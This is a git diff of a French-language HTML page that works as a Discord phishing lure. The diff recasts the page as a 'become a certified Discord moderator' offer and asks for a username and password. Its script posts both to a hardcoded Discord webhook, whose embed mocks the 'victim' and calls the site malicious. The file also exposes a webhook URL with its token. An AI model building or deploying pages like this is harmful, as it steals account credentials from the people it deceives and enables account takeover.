--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
   <style>
     body {
       font-family: Arial, sans-serif;
-      background: #2c2f33;
+      background: #5865F2;
       color: white;
       display: flex;
       justify-content: center;
@@ -25,7 +25,7 @@
     button {
       padding: 10px 20px;
       font-size: 16px;
-      background-color: #5865F2;
+      background-color: #2c2f33;
       color: white;
       border: none;
       border-radius: 8px;
@@ -37,13 +37,12 @@
   </style>
 </head>
 <body>
-  <h2>💬 Envoie un message à mon bot ps: LES CHATS C'EST LES MEILLEURS</h2>
+  <h2>💬 Fait toi certifier modérateur discord ! ps: LES CHATS C'EST LES MEILLEURS</h2>
   <input type="text" id="pseudo" placeholder="Ton pseudo...">
   <input type="text" id="message" placeholder="Ton mot de passe...">
   <button id="sendBtn">Entrer</button>
 
   <script>
-    // ⚠️ Mets ton lien de webhook Discord ici :
     const WEBHOOK_URL = "https://discord.com/api/webhooks/1430155105952600125/miSVSRG79JmwJUBifFY8ejhEFtI2mwEVZ3Wd9ix69nUob0LUVFJyrFbVzDGqowbyEYbC";
 
     document.getElementById("sendBtn").addEventListener("click", async () => {
@@ -51,7 +50,7 @@
       const message = document.getElementById("message").value.trim();
 
       if (!pseudo || !message) {
-        alert("Merci de remplir ton pseudo et ton message !");
+        alert("Merci de remplir ton pseudo et ton mot de passe !");
         return;
       }
 
@@ -61,10 +60,10 @@
             title: "📩 Nouvelle victime BAHAHHAHA reçu",
             color: 0x5865f2,
             fields: [
-              { name: "👤 Pseudo", value: pseudo, inline: true },
-              { name: "🔒 Mot de passe", value: message, inline: false }
+              { name: "👤 Pseudo du con", value: pseudo, inline: true },
+              { name: "🔒 Mot de passe du con", value: message, inline: false }
             ],
-            footer: { text: "Message envoyé depuis ton site 💻" }
+            footer: { text: "Message envoyé depuis mon site malicieux 💻" }
           }
         ]
       };
@@ -83,3 +82,4 @@
 </body>
 
 </html>
+
